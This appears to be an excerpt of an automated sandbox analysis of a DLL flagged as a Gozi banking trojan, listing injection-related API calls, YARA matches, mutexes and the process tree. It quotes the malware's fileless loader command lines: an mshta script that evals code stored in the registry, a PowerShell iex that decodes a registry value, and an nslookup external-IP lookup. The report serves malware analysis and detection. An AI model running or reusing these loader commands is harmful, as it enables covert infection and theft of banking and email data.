        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013845FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01394C67 NtGetContextThread,RtlNtStatusToDosError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01391606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
        Source: C:\Windows\explorer.exeCode function: 32_2_04E01DF4 NtWriteVirtualMemory,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
        Source: C:\Windows\explorer.exeCode function: 32_2_04E046EC NtAllocateVirtualMemory,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF3EF4 NtQuerySystemInformation,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFF0D0 NtReadVirtualMemory,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF1084 NtQueryInformationProcess,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE69DC NtSetContextThread,NtUnmapViewOfSection,NtClose,
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEB980 NtMapViewOfSection,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE1148 NtCreateSection,
        Source: C:\Windows\explorer.exeCode function: 32_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF40A4 NtQueryInformationProcess,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE1084 NtQueryInformationProcess,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AEF0D0 NtReadVirtualMemory,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00ADB980 NtMapViewOfSection,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFD9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD1148 NtCreateSection,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF1DF4 NtWriteVirtualMemory,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF46EC NtAllocateVirtualMemory,
        Source: C:\Windows\System32\control.exeCode function: 33_2_00B11003 NtProtectVirtualMemory,NtProtectVirtualMemory,
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675761084 NtQueryInformationProcess,
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675791003 NtProtectVirtualMemory,NtProtectVirtualMemory,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A1CB8 CreateProcessAsUserA,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021A4
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F840B3
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8AF44
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A7188
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139D057
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013948AD
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138D0DC
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138E384
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01398BF3
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013862FA
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139ED4B
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01384C03
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139D7BD
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A3EAF
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEECE0
        Source: C:\Windows\explorer.exeCode function: 32_2_04E05428
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEDF58
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0A074
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFB814
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE69DC
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEB9E8
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFD92C
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEDA3C
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFAA28
        Source: C:\Windows\explorer.exeCode function: 32_2_04E093FC
        Source: C:\Windows\explorer.exeCode function: 32_2_04E04B78
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEFCA0
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF1C0C
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE65D8
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF75D8
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF8DD0
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE5DA8
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF25A4
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0C560
        Source: C:\Windows\explorer.exeCode function: 32_2_04E07D44
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF6528
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE96D8
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFCE90
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE1600
        Source: C:\Windows\explorer.exeCode function: 32_2_04E10614
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFA0F0
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF9850
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF782C
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE49C4
        Source: C:\Windows\explorer.exeCode function: 32_2_04E019FC
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0A9FC
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF99F8
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE596C
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEE2B0
        Source: C:\Windows\explorer.exeCode function: 32_2_04E1027C
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0EA40
        Source: C:\Windows\explorer.exeCode function: 32_2_04E06250
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0E220
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF7218
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE2A34
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE9A34
        Source: C:\Windows\explorer.exeCode function: 32_2_04E003EC
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0A3B2
        Source: C:\Windows\explorer.exeCode function: 32_2_04DE7B44
        Source: C:\Windows\explorer.exeCode function: 32_2_04DFB378
        Source: C:\Windows\explorer.exeCode function: 32_2_04DF6B00
        Source: C:\Windows\explorer.exeCode function: 32_2_04E2138C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD69DC
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF4B78
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF5428
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AEA0F0
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE782C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AEB814
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFA074
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE9850
        Source: C:\Windows\System32\control.exeCode function: 33_2_00ADB9E8
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF19FC
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFA9FC
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE99F8
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD49C4
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AED92C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD596C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AEAA28
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFE220
        Source: C:\Windows\System32\control.exeCode function: 33_2_00ADDA3C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD2A34
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD9A34
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE7218
        Source: C:\Windows\System32\control.exeCode function: 33_2_00B0027C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFEA40
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF6250
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFA3B2
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF03EC
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF93FC
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE6B00
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AEB378
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD7B44
        Source: C:\Windows\System32\control.exeCode function: 33_2_00ADFCA0
        Source: C:\Windows\System32\control.exeCode function: 33_2_00ADECE0
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE1C0C
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD5DA8
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE25A4
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD65D8
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE75D8
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE8DD0
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AE6528
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFC560
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AF7D44
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AECE90
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD96D8
        Source: C:\Windows\System32\control.exeCode function: 33_2_00B00614
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AD1600
        Source: C:\Windows\System32\control.exeCode function: 33_2_00ADDF58
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675774B78
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675775428
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576CE90
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757596D8
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675755DA8
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757625A4
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577C560
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675780614
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675751600
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757675D8
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757565D8
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675768DD0
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577A074
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675769850
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576D92C
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576A0F0
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067575DF58
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576782C
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576B814
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067578027C
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675776250
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675757B44
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675766B00
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757549C4
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067575596C
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067575DA3C
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577EA40
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576AA28
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675752A34
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675759A34
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577E220
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675767218
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757719FC
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577A9FC
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757699F8
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067575B9E8
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757569DC
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067575FCA0
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675777D44
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675766528
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067575ECE0
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577A3B2
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067576B378
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_0000020675761C0C
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757793FC
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_00000206757703EC
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067579138C
        Source: out.dllStatic PE information: invalid certificate
        Source: f1lrerxf.dll.26.drStatic PE information: No import functions for PE file found
        Source: ntdrbunx.dll.29.drStatic PE information: No import functions for PE file found
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: out.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
        Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@28/33@7/2
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8229C CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
        Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{857C95B3-5D28-11EB-90E5-ECF4BB2D2496}.datJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{A6C5620A-CD20-C84B-873A-517CAB0E1570}
        Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{8E231364-9555-F0A9-8FA2-992433F6DD98}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
        Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{EA8F1CAB-417E-AC42-1BBE-05A07FD209D4}
        Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
        Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF75DD507BDBD79E0A.TMPJump to behavior
        Source: out.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
        Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
        Source: out.dllVirustotal: Detection: 36%
        Source: out.dllReversingLabs: Detection: 45%
        Source: loaddll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\out.dll'
        Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2
        Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
        Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
        Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2
        Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2
        Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
        Source: C:\Windows\explorer.exeProcess created: unknown unknown
        Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
        Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
        Source: out.dllStatic PE information: More than 200 imports for KERNEL32.dll
        Source: out.dllStatic PE information: More than 200 imports for USER32.dll
        Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.525112099.00000198C4F60000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.534673965.000001F4112D0000.00000002.00000001.sdmp
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
        Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
        Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
        Source: Binary string: rundll32.pdb source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
        Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp

        Data Obfuscation:

        barindex
        Suspicious powershell command line foundShow sources
